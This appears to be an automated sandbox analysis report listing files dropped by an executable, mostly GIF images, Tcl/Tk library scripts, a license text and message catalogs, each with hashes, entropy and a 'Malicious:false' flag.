                                                                                                                                                                                                                              Preview:GIF89a@.d.............................f.................f...ff.f3.f..33.3.........f..ff.f3.33.3.f..f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....@.d....@.pH,..E.... ..(...H$..v..j....K....q..5L......^).3.Y7..r..u.v|g..om...\iHl..p...`G..\~....fn[q...P.g.Z.l....y...\.l......f.Z.g...%%....e...e...)....O.f..e. ....O..qf..%..(.H.u..]..&....#4.......@.).....u!.M..2. ..PJ..#..T..a.....P.Gi... <Hb....x..z.3.X.O..f.........].Bt..lB.Q.r...9pP....&...L. ..,`[.....E6.Q.....?.#L......|g........N....[.._........."4......b....G6.........m.zI].....I.@.......I.9...glew...2.B..c>./..2....x.....<...{...7;.....y.I.....4G.Qj0..7..%.W.V...?!..[...X..=..k.h..[Q<.....0.B....(P.x.,.......8O*Z.8P!.$....u.c..Ea!..eC....CB.. .H..E..#..C..E...z..&.Nu........c.0..#.T.M.U........l.p @..s.|..pf!..&.......8.#.8.....*..J>. .t..h6(........#..0.A...*!..)...x..u.Z....*%..H.....*.......`......|.....1.......&.....T*...f.l...
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 97 x 150
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2489
                                                                                                                                                                                                                              Entropy (8bit):7.708754027741608
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:/Ev7JJ+3uvz/Hwbcp7igaIwjBui7qFxIIOdJXcI+Ks:M9oWz/7pZAV7qPIImJXtXs
                                                                                                                                                                                                                              MD5:711F4E22670FC5798E4F84250C0D0EAA
                                                                                                                                                                                                                              SHA1:1A1582650E218B0BE6FFDEFFD64D27F4B9A9870F
                                                                                                                                                                                                                              SHA-256:5FC25C30AEE76477F1C4E922931CC806823DF059525583FF5705705D9E913C1C
                                                                                                                                                                                                                              SHA-512:220C36010208A87D0F674DA06D6F5B4D6101D196544ABCB4EE32378C46C781589DB1CE7C7DFE6471A8D8E388EE6A279DB237B18AF1EB9130FF9D0222578F1589
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89aa...............................f.................f...ff.f3.f..33.3............f..ff.f3.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,....a......@.pH,...r.l:..TB.T..V..z..H.j..h...&.......t"....F...d..gN~Y...g....}..r....g.....o...g.......Y.w..W......N....Z....W....f...tL.~.f....New............W.M.r.........O.q........W-./i.*...`..z..F9.../9..-.......$6..G..S...........zB.,nw.64...e4.......HOt......f.....)..OX..C.eU.(.Qh.....T..<Q.Y.P.L.YxT....2........ji..3.^)zz..O.a..6 ...TZ........^...7.....>|P.....w$...k.ZF.\R.u....F.]Z.--(v+)[Y....=.!.W..+.]..]._.....&..../Ap...j...!..b.:...{.^.=.`...U.....@Hf..\?.(..Lq@.........0..L...a...&.!.....]#..]G \..q...A.H.X[...(.W......,...1a..B...W(.t.8.AdG.)..(P=...Uu.u..A.KM\...'r.R./.W..d2a.0..G...?...B......#H........1Q.0...R....%+...0.I..{.<......QV.tz'.yn.E.p..0i.I.g......L....%....K...A.l.ph.Q.1e...Z....g..2e...smU&d;.J..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 113 x 175
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2981
                                                                                                                                                                                                                              Entropy (8bit):7.758793907956808
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:AmEwM8ioQoHJQBTThKVI7G78NLL120GFBBFXJRxlu+BmO/5lNqm7Eq:B57QoHJQt4II8BZ+jxluZO/5lNqm7Eq
                                                                                                                                                                                                                              MD5:DA5FB10F4215E9A1F4B162257972F9F3
                                                                                                                                                                                                                              SHA1:8DB7FB453B79B8F2B4E67AC30A4BA5B5BDDEBD3B
                                                                                                                                                                                                                              SHA-256:62866E95501C436B329A15432355743C6EFD64A37CFB65BCECE465AB63ECF240
                                                                                                                                                                                                                              SHA-512:990CF306F04A536E4F92257A07DA2D120877C00573BD0F7B17466D74E797D827F6C127E2BEAADB734A529254595918C3A5F54FDBD859BC325A162C8CD8F6F5BE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89aq...............................f.................f...ff.f3.f..33.3............f..ff.f3.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3................................................................!.. -dl-.!.......,....q......@.pH,...r.l:....A}H...v..R......D.VF..,%M....^.....fyzU.P..f...i.....t..Uqe..N..Z..i......~....g......u.....g......\...h.....P...h.....Q..g....Z..h......]......\...M...[..s...c2.+R.$. ......#.....)v..4....MO.b.....9......[.M.........h'..<-..=.....HQD....D?.~......W7. ..V.W0..l....*0p}..KP?c.\@KW.S(..M..B.....-q...S2...*.,..P.{....F..._MAn ....i.Y3............zh.y.j@...a876...ui.i..;K.........p...`.,}w....tv.m...Y..........;.;.e).e&.......-.NC.*4..(........*..F........[,w....f......E....h..a3.T.^.........)...C.N8.h\T...+&.z....g]H..B..#.t6..Z.....j.-..N......TI....A........M?..Q&V'...Mb.f.x...h.$r.U .9..Ci. ].4.Zb..@...X....%..<..b)V!........Y)x......T.....h.p.d..h..(........]@.**J.M.U.Jf...Y.:....F..g:..d..6q.-..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 130 x 200
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3491
                                                                                                                                                                                                                              Entropy (8bit):7.790611381196208
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ROGuxkQ9mcV7RXcECEtqCa+6GK8WseNXhewFIp9ZmL4u:ROGwpVOEbqCrWsUhtIk4u
                                                                                                                                                                                                                              MD5:A5E4284D75C457F7A33587E7CE0D1D99
                                                                                                                                                                                                                              SHA1:FA98A0FD8910DF2EFB14EDAEC038B4E391FEAB3C
                                                                                                                                                                                                                              SHA-256:BAD9116386343F4A4C394BDB87146E49F674F687D52BB847BD9E8198FDA382CC
                                                                                                                                                                                                                              SHA-512:4448664925D1C1D9269567905D044BBA48163745646344E08203FCEF5BA1524BA7E03A8903A53DAF7D73FE0D9D820CC9063D4DA2AA1E08EFBF58524B1D69D359
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89a................................f.................f...ff.f3.f..33.3............f..ff.3f.33.3.f..ff.ff.ffff3ff333f.3f.33.33f.3...................................................................!.. -dl-.!.......,...........@.pH,...r.l:..T..F$XIe..V$.x..V.Z.z..F.pxd~..........{....o....l..{.b...hi[}P.k...y.....y.f.._R.\...............m.....y.....x......^.Q...j.....\S.....^.......l......]...[.......).....{....7...`..<...`..">..i.?/..@............>..Z.z@....0B..r...j.V.I.@..;%R...*...J.p.A.t.*..$A*...>`.....@g5BP.A..p.x.............q..8...... ...(.Q..#..@...F..YSK..M..#o.....D.m..-.....k}...BT..V......'.....`.d..~;..9+..6...<b.eZ..y^0]0..I...=.6.....}.0<.Z...M...Y1*35.e.....b...U0F~.-.HT......l2.s.q`-....y...e....dPZ....~.zT.M.... "r.E/k. ...*..Lj@'........Pcd&.(..mxF_w.."K..x!..--Y`..A.....Be.jH.A..\..j.....du#.....]^...>......].i.FMO..].9n1",Y...F...EW.9.....0TY.T...Cv!i`%...Hz@.]..U.!Y...#Dv&pi.z(.mn.A....@Q.0.%...&.4.v.cw(.`cd'|..M9..."...,*.......
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 48 x 75
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1171
                                                                                                                                                                                                                              Entropy (8bit):7.289201491091023
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:DOfHIzP8hqiF+oyPOmp3XHhPBlMVvG0ffWLpfc:DGoPM+o0OmZXHhOv5WRc
                                                                                                                                                                                                                              MD5:7013CFC23ED23BFF3BDA4952266FA7F4
                                                                                                                                                                                                                              SHA1:E5B1DED49095332236439538ECD9DD0B1FD4934B
                                                                                                                                                                                                                              SHA-256:462A8FF8FD051A8100E8C6C086F497E4056ACE5B20B44791F4AAB964B010A448
                                                                                                                                                                                                                              SHA-512:A887A5EC33B82E4DE412564E86632D9A984E8498F02D8FE081CC4AC091A68DF6CC1A82F4BF99906CFB6EA9D0EF47ADAC2D1B0778DCB997FB24E62FC7A6D77D41
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89a0.K.............................f.................f...ff.f3.f..33.3.........f..ff.f3.3f.33.3.f..ff.ff.f3ff333f.3f.33.33f.3......................................................................!.. -dl-.!.......,....0.K....@.pH,...GD.<:..%SR.Z......<.V.$l.....z......:.. .|v[D..f...z.W.G.Vr...NgsU.yl..qU..`.......`fe`.......Fg....(.&...g.Y.. .."..q.V.$.'.Ez.W....y...Y.U...(#Xrf.........Xux.U..........(U.4...X....G.B..t..1S...R..Y. ...l ..".>.h......,%K....A.....<s....#..8.iK.....a.y$h..DQh.PE)....6.....MyL.qzF..... ."..Y0..a......2..*t..Ma..b...M..R.....\..st..=....Q......,>s`....Qt.,..B.R.....!.$..%.....(...s...B.T...`,".h(. D....8..dC..\Q.p.......x.#A.....:..du..(D.XV......7....S.#n8a....2`...f.:G,...==(......`!..$...t....b..../N|...f..J.x... P&.|.d._!N...].1w.3D.0!....@o&H...N.B.J....pz8..w.i....=r.............@5.-!.......H."..[.j.AB<..p....h...V.D..6.h...ab1F.g...I !.V~.H..V.........:.G..|c...,.....TD5..c[.W.....LC.....FJ..71[..lH.M.....8.:$......
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 100 x 100
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5473
                                                                                                                                                                                                                              Entropy (8bit):7.754239979431754
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:+EqG96vSGfyJZ26G6U1LI7nTD2enhjc+2VBnOqcUERVIim:+46KcyJI6G6uU7/LhjlkhQR7m
                                                                                                                                                                                                                              MD5:048AFE69735F6974D2CA7384B879820C
                                                                                                                                                                                                                              SHA1:267A9520C4390221DCE50177E789A4EBD590F484
                                                                                                                                                                                                                              SHA-256:E538F8F4934CA6E1CE29416D292171F28E67DA6C72ED9D236BA42F37445EA41E
                                                                                                                                                                                                                              SHA-512:201DA67A52DADA3AE7C533DE49D3C08A9465F7AA12317A0AE90A8C9C04AA69A85EC00AF2D0069023CD255DDA8768977C03C73516E4848376250E8D0D53D232CB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:GIF89ad.d...................RJJ...B99.......RBB..B11ZBB!....R991!!...)....{{B!!R)).JJ.ss.ZZ.BB.kk.RR.JJ.BB9...JJR!!.ZZ.BB.11.99.{s.sk.kc.cZ.ZR.JB.ZR.JB.JB.RJ.B9.91.B9...{.JB.91.B9.B9.1){)!.)!.9)..ZR.JB{91.cR{1).ZJ.ZJ.RB.J9.B1.B1.9).1!....{B9.{k.scc1).kZZ)!c)!.9).B1.9).9).1!.1!.1!.B).9!.9!.1..).....{.sZ1)R)!.B1.B1.ZBR!..9).ZB.9).R9.R9.1!.J1.J1.B).B).9!.9!.1..1..).....sZ.J9.ZB.cJJ!.{1!.B).9!{)..9!.J).B!.B!.9..R1).kJ)!.B1{9).R9.cB.Z9.Z9.B).Z9.B).R1.9!.R1.J).J).B!.1..9....{.s.J9.{Z.ZB.sR.kJk1!.cB.cB.R1.R).1..B!.J!.B.....R91.J1).c.kJ.J).Z1.B!.B!..9!..{R.sJ.Z9.R1{9!..s.R9.Z...J91Z9){B)...............B91..1)!..............................RJR............B)1......R19........BJ.9B..{..s{......!.......,....d.d.@............0@PHa....*.p...7.8.y...C.s6Z.%Q.#s.`:B.N....4jd.K.0..|y....F@.......1~ ......'Y.B"C&R.V.R.4$k.3...D.......Ef*Y3..M........BDV._.....\..).]..>s..$H\%y0WL...d.......D..'..v..1Kz.Zp$;S
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2307
                                                                                                                                                                                                                              Entropy (8bit):5.135743409565932
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:XU/zAcKT6yOCaDBfsHLk32s3J5w83KDyP1BXy3JQz7yuC:XNc+92sg3A8uyDXy3JQnDC
                                                                                                                                                                                                                              MD5:F090D9B312C16489289FD39813412164
                                                                                                                                                                                                                              SHA1:1BEC6668F6549771DADC67D153B89B8F77DCD4B9
                                                                                                                                                                                                                              SHA-256:0D1E4405F6273F091732764ED89B57066BE63CE64869BE6C71EA337DC4F2F9B5
                                                                                                                                                                                                                              SHA-512:57B323589C5A8D9CBB224416731D8CE65C4B94146DF15CE30885DF63B1D0B3F709093B65390A911F84F20B7C5DE3C0AF9B4D7D531742BE046EDA6E8C3432EF6E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:This software is copyrighted by the Regents of the University of..California, Sun Microsystems, Inc., Scriptics Corporation, ActiveState..Corporation, Apple Inc. and other parties. The following terms apply to..all files associated with the software unless explicitly disclaimed in..individual files.....The authors hereby grant permission to use, copy, modify, distribute,..and license this software and its documentation for any purpose, provided..that existing copyright notices are retained in all copies and that this..notice is included verbatim in any distributions. No written agreement,..license, or royalty fee is required for any of the authorized uses...Modifications to this software may be copyrighted by their authors..and need not follow the licensing terms described here, provided that..the new terms are clearly indicated on the first page of each file where..they apply.....IN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY..FOR DIRECT, INDIRECT, SPECIAL, INCI
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15255
                                                                                                                                                                                                                              Entropy (8bit):4.9510475386072095
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:apDYV5Yupn5OcckwBv3HCpg2J8JvJBfWeZhXkz+WkHGowv:aPPkevB2JuvJ9D3XmSc
                                                                                                                                                                                                                              MD5:804E6DCE549B2E541986C0CE9E75E2D1
                                                                                                                                                                                                                              SHA1:C44EE09421F127CF7F4070A9508F22709D06D043
                                                                                                                                                                                                                              SHA-256:47C75F9F8348BF8F2C086C57B97B73741218100CA38D10B8ABDF2051C95B9801
                                                                                                                                                                                                                              SHA-512:029426C4F659848772E6BB1D8182EB03D2B43ADF68FCFCC1EA1C2CC7C883685DEDA3FFFDA7E071912B9BDA616AD7AF2E1CB48CE359700C1A22E1E53E81CAE34B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# listbox.tcl --..#..# This file defines the default bindings for Tk listbox widgets..# and provides procedures that help in implementing those bindings...#..# Copyright (c) 1994 The Regents of the University of California...# Copyright (c) 1994-1995 Sun Microsystems, Inc...# Copyright (c) 1998 by Scriptics Corporation...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES.....#--------------------------------------------------------------------------..# tk::Priv elements used in this file:..#..# afterId -..Token returned by "after" for autoscanning...# listboxPrev -.The last element to be selected or deselected..#...during a selection operation...# listboxSelection -.All of the items that were selected before the..#...current selection operation (such as a mouse..#...drag) started; used to cancel an operation...#--------------------------------------------------------------------------....#--------------
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:Tcl script, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9862
                                                                                                                                                                                                                              Entropy (8bit):4.786615174847384
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:mvEEVwjVwqOpOLbkVAg/vyKEZ25YbKZbwrmQ:mvEEVwJwpALPgnyx25YGZkr3
                                                                                                                                                                                                                              MD5:D83ED6AC2912900040530528A0237AB3
                                                                                                                                                                                                                              SHA1:2D18E42A8B96C3D71C1C6701010FDF75C1E6D5D8
                                                                                                                                                                                                                              SHA-256:848258B946C002E2696CA3815A1589C8120AF5CC41FBC11BBD9A3F5754CC21AF
                                                                                                                                                                                                                              SHA-512:00B4CD0D58029FC37820C163A4AE1DEAD22FB5C767BDC118659EACE26D449C362189611DFB3FAB1AC129FABFEC2CE853EA2C10D418FAE5AEB91DDC9330FF782D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# megawidget.tcl..#..#.Basic megawidget support classes. Experimental for any use other than..#.the ::tk::IconList megawdget, which is itself only designed for use in..#.the Unix file dialogs...#..# Copyright (c) 2009-2010 Donal K. Fellows..#..# See the file "license.terms" for information on usage and redistribution of..# this file, and for a DISCLAIMER OF ALL WARRANTIES...#....package require Tk.....::oo::class create ::tk::Megawidget {.. superclass ::oo::class.. method unknown {w args} {...if {[string match .* $w]} {... [self] create $w {*}$args... return $w...}...next $w {*}$args.. }.. unexport new unknown.. self method create {name superclasses body} {...next $name [list \....superclass ::tk::MegawidgetClass {*}$superclasses]\;$body.. }..}....::oo::class create ::tk::MegawidgetClass {.. variable w hull options IdleCallbacks.. constructor args {...# Extract the "widget name" from the object name...set w [namespace tail [self]].....# Configure things...
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):39790
                                                                                                                                                                                                                              Entropy (8bit):4.915612301723047
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:NKJsO8O4IzOQjJwxzire5pKVjriecYyq4CpKgnP:NKJsO8iOQizire54lriecYf40
                                                                                                                                                                                                                              MD5:B7DAA21C1C192B8CB5B86CBD7B2CE068
                                                                                                                                                                                                                              SHA1:AE8ABF9017F37CCDF5D0D15DE66BB124A7482BA0
                                                                                                                                                                                                                              SHA-256:312AF944A276CDBF1EE00757EF141595670984F7F13E19922C25643A040F5339
                                                                                                                                                                                                                              SHA-512:B619E3B8BE5EC4545E97B7A7A7F7FECC2AAFA58438F9CA3819F644720CF5FF5C44DA12AC25988570E595D97CAD799F87D93C24D5E67A7A953B9F5312952FBEB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# menu.tcl --..#..# This file defines the default bindings for Tk menus and menubuttons...# It also implements keyboard traversal of menus and implements a few..# other utility procedures related to menus...#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 1998-1999 Scriptics Corporation...# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....#-------------------------------------------------------------------------..# Elements of tk::Priv that are used in this file:..#..# cursor -..Saves the -cursor option for the posted menubutton...# focus -..Saves the focus during a menu selection operation...#...Focus gets restored here when the menu is unposted...# grabGlobal -..Used in conjunction with tk::Priv(oldGrab): if..#...tk::Priv(oldGrab) is non
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30840
                                                                                                                                                                                                                              Entropy (8bit):5.142909056222569
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:+c4g8rSnBGzHsGK83Ch0x/0kmSq6O4+rNfPCpM2sEmqKys3pCJxi5dEaY:+c4g8OnBGzBK83Ch0x/0FSq6OnrGM2h3
                                                                                                                                                                                                                              MD5:983C7B78F1A0EBACAB8006D391A01FCD
                                                                                                                                                                                                                              SHA1:7EA37474EA039ED7A37BFDD7D76EAE673E666283
                                                                                                                                                                                                                              SHA-256:C5BDCA3ABA671F03DC4624AB5FD260490F5002491D6C619142CCF5A1A744528A
                                                                                                                                                                                                                              SHA-512:A006EF9B7213E572F6FC540D1512A52C52FEC44E3A07846DE09662AE32B7191C5CF639798531847B39E4076BF9DD6314B6F5373065C04F4FEF221185B39C3117
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# mkpsenc.tcl --..#..# This file generates the postscript prolog used by Tk.....namespace eval ::tk {.. # Creates Postscript encoding vector for ISO-8859-1 (could theoretically.. # handle any 8-bit encoding, but Tk never generates characters outside.. # ASCII)... #.. proc CreatePostscriptEncoding {} {...variable psglyphs...# Now check for known. Even if it is known, it can be other than we...# need. GhostScript seems to be happy with such approach...set result "\[\n"...for {set i 0} {$i<256} {incr i 8} {... for {set j 0} {$j<8} {incr j} {....set enc [encoding convertfrom "iso8859-1" \.....[format %c [expr {$i+$j}]]]....catch {.... set hexcode {}.... set hexcode [format %04X [scan $enc %c]]....}....if {[info exists psglyphs($hexcode)]} {.... append result "/$psglyphs($hexcode)"....} else {.... append result "/space"....}... }... append result "\n"...}...append result "\]"...return $result.. }.... # List of adobe glyph names. Converted from glyph
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:xbm image (32x, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16786
                                                                                                                                                                                                                              Entropy (8bit):4.717927930017041
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:+haZOxBpK8uxGe4V88/wxY3Fxqipz4zz4zxxFzxT4OcErDxqdRRZeuC/Vj2CoopC:+hRWRG3FFjvsfCoopwITHzLHFHHAABs
                                                                                                                                                                                                                              MD5:217087AB6B2A8F9D7252E311D69C3769
                                                                                                                                                                                                                              SHA1:09AEB2BC5B7C7F4AB3DE4211D786C519AE0970F6
                                                                                                                                                                                                                              SHA-256:A07E3A3809CED3C6C9C1E171DCA5AD1F28357734CD41B2B9DD9F58085B3D2842
                                                                                                                                                                                                                              SHA-512:6E57633C924BFC16D380C014C20DD24D5727E70D4843FCEC4D7995B4DB21941EA8F2A5FD6E5386DF3364B6905D4D66B2B9595DC8FC70CFF40A2D49A92A1B6FBA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# msgbox.tcl --..#..#.Implements messageboxes for platforms that do not have native..#.messagebox support...#..# Copyright (c) 1994-1997 Sun Microsystems, Inc...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....# Ensure existence of ::tk::dialog namespace..#..namespace eval ::tk::dialog {}....image create bitmap ::tk::dialog::b1 -foreground black \..-data "#define b1_width 32\n#define b1_height 32..static unsigned char q1_bits[] = {.. 0x00, 0xf8, 0x1f, 0x00, 0x00, 0x07, 0xe0, 0x00, 0xc0, 0x00, 0x00, 0x03,.. 0x20, 0x00, 0x00, 0x04, 0x10, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x10,.. 0x04, 0x00, 0x00, 0x20, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,.. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,.. 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x80,.. 0x01, 0x00, 0x00, 0x80, 0x02, 0x00, 0x00, 0x40, 0x02, 0x00, 0x00, 0x40,.. 0x04, 0x00,
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4235
                                                                                                                                                                                                                              Entropy (8bit):4.789130604359491
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nlw9Twd+j3gLhokqwX+hTnJgNanPNcgRhgP+5QPwJJENL:nlw9TjjwI3hTnJgNaRhgP75L
                                                                                                                                                                                                                              MD5:5A8B46B85DCCBF74E2B5B820E1A7B9D1
                                                                                                                                                                                                                              SHA1:980F4FC5BABA82BA0FE02F9BD03A23DF6D565BB1
                                                                                                                                                                                                                              SHA-256:4DFFBEEDBF0D66D84B13088016D1A782CEAAD4DED27BE1E38842F8969C0E533F
                                                                                                                                                                                                                              SHA-512:2D81FC06CF3C20E4F6314BD13AF81FDE38A9B06510584C84C6A0C8C36314F980F77D02BD8056E7EE5DE599A0620E0C0349124147334B9C141145270046B19D90
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset cs "&Abort" "&P\u0159eru\u0161it".. ::msgcat::mcset cs "&About..." "&O programu...".. ::msgcat::mcset cs "All Files" "V\u0161echny soubory".. ::msgcat::mcset cs "Application Error" "Chyba programu".. ::msgcat::mcset cs "Bold Italic".. ::msgcat::mcset cs "&Blue" "&Modr\341".. ::msgcat::mcset cs "Cancel" "Zru\u0161it".. ::msgcat::mcset cs "&Cancel" "&Zru\u0161it".. ::msgcat::mcset cs "Cannot change to the directory \"%1\$s\".\nPermission denied." "Nemohu zm\u011bnit atku\341ln\355 adres\341\u0159 na \"%1\$s\".\nP\u0159\355stup odm\355tnut.".. ::msgcat::mcset cs "Choose Directory" "V\375b\u011br adres\341\u0159e".. ::msgcat::mcset cs "Cl&ear" "Sma&zat".. ::msgcat::mcset cs "&Clear Console" "&Smazat konzolu".. ::msgcat::mcset cs "Color" "Barva".. ::msgcat::mcset cs "Console" "Konzole".. ::msgcat::mcset cs "&Copy" "&Kop\355rovat".. ::msgcat::mcset cs "Cu&t" "V&y\u0159\355znout".. ::msgcat::mcset cs "&
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3987
                                                                                                                                                                                                                              Entropy (8bit):4.651948695787255
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:nRZ2uDMr05sIEzs2KkrT+XuTKN0FjDDP9:nRZzDy4kBKkrT+QpP9
                                                                                                                                                                                                                              MD5:227B0F255F854460E8E5146ED7A17B85
                                                                                                                                                                                                                              SHA1:99A080CAD631F21963C51A5B254BDAD3724DC866
                                                                                                                                                                                                                              SHA-256:FEEF8F8AD33BB3362C845A25D6ED273C398051047D899B31790474614C7AFD2D
                                                                                                                                                                                                                              SHA-512:36A4B48831316CC29686CC76DA00110EB078EC56F55A960D11AE427AA3D913C340C1E3805BF2AD40C1A8A92FC6587DA5D2C245E7501289FC3E228BE14FE49598
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:namespace eval ::tk {.. ::msgcat::mcset da "&Abort" "&Afbryd".. ::msgcat::mcset da "&About..." "&Om...".. ::msgcat::mcset da "All Files" "Alle filer".. ::msgcat::mcset da "Application Error" "Programfejl".. ::msgcat::mcset da "&Blue" "&Bl\u00E5".. ::msgcat::mcset da "Cancel" "Annuller".. ::msgcat::mcset da "&Cancel" "&Annuller".. ::msgcat::mcset da "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ikke skifte til katalog \"%1\$s\".\nIngen rettigheder.".. ::msgcat::mcset da "Choose Directory" "V\u00E6lg katalog".. ::msgcat::mcset da "Cl&ear" "&Ryd".. ::msgcat::mcset da "&Clear Console" "&Ryd konsolen".. ::msgcat::mcset da "Color" "Farve".. ::msgcat::mcset da "Console" "Konsol".. ::msgcat::mcset da "&Copy" "&Kopier".. ::msgcat::mcset da "Cu&t" "Kli&p".. ::msgcat::mcset da "&Delete" "&Slet".. ::msgcat::mcset da "Details >>" "Detailer".. ::msgcat::mcset da "Directory \"%1\$s\" does not exist." "Katalog \"%1\$s\" finde
